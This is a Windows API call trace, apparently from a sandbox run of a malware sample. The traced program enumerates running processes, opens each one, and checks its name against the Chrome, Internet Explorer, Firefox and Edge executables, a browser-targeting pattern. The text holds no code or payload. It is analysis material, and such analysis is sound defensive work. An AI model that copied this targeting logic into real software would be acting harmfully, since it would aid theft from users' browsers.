	[0215.334] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0215.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x44b0
	[0215.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.335] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.335] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.335] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.335] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.336] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0215.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x44b4
	[0215.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.336] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.337] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.337] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.337] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.338] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0215.338] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x44b8
	[0215.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.338] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0215.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.339] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.339] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0215.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.339] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.340] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0215.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x44bc
	[0215.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.340] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0215.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.341] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.341] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0215.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.341] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.342] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0215.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x44c0
	[0215.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.342] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0215.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.343] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.343] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0215.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.343] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.344] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0215.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x44c4
	[0215.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.344] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0215.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.345] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.345] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0215.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.346] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0215.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x44c8
	[0215.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.347] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0215.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.347] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.347] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0215.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.348] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.348] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0215.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x44cc
	[0215.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.349] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0215.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.349] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.349] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0215.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.350] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.350] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x44d0
	[0215.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.351] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.351] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.351] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.352] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.352] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x44d4
	[0215.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.353] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.353] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.353] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.354] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.354] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.355] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x44d8
	[0215.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.355] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.355] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.355] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.356] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.356] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x44dc
	[0215.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.357] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.357] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.358] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.358] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.358] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x44e0
	[0215.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.359] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.359] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.360] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.360] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.360] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.361] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x44e4
	[0215.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.361] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.362] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.362] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.362] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.362] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.363] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x44e8
	[0215.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.363] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.364] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.364] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.364] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.364] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.365] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0215.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x44ec
	[0215.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.366] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0215.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.366] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.366] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0215.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.367] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.367] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x44f0
	[0215.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.368] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.368] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.368] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.369] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.369] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0215.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x44f4
	[0215.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.370] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.370] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.370] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.371] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.371] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0215.372] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x44f8
	[0215.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.372] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0215.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.372] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.373] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0215.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.373] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.373] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0215.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x44fc
	[0215.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.413] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0215.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.413] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.413] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0215.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.414] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.414] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0215.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x4500
	[0215.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.415] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0215.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.415] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.416] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0215.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.416] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.416] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0215.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x4504
	[0215.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.417] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0215.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.417] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.418] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0215.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.418] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.418] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0215.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x4508
	[0215.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.419] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0215.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.419] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.420] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0215.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.420] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.420] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0215.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x450c
	[0215.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.422] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0215.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.422] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0215.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.423] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0215.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.423] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0215.423] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0215.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0215.424] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0215.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x4510
	[0215.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0215.425] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0215.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
